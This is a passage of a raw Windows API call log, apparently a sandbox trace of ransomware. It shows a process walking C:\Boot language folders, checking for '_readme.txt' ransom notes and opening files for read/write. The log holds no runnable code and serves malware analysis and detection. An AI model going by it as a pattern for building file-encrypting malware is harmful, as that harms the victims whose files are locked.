ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.239] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.239] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.240] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.241] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.241] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.243] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0097.243] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.243] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.243] PathFindFileNameW (pszPath="") returned="" [0097.243] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.244] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.244] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.244] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.245] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0097.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.245] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0097.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.245] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.245] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.245] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.245] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0097.245] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.246] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a6e380, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.246] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned=".txt" [0097.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.246] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a6e380, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.246] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.246] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.246] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.246] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.248] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0097.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.248] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.248] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.248] PathFindFileNameW (pszPath="") returned="" [0097.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.248] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.249] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.249] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0097.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.249] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.249] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0097.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.249] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0097.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.250] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.250] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0097.250] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 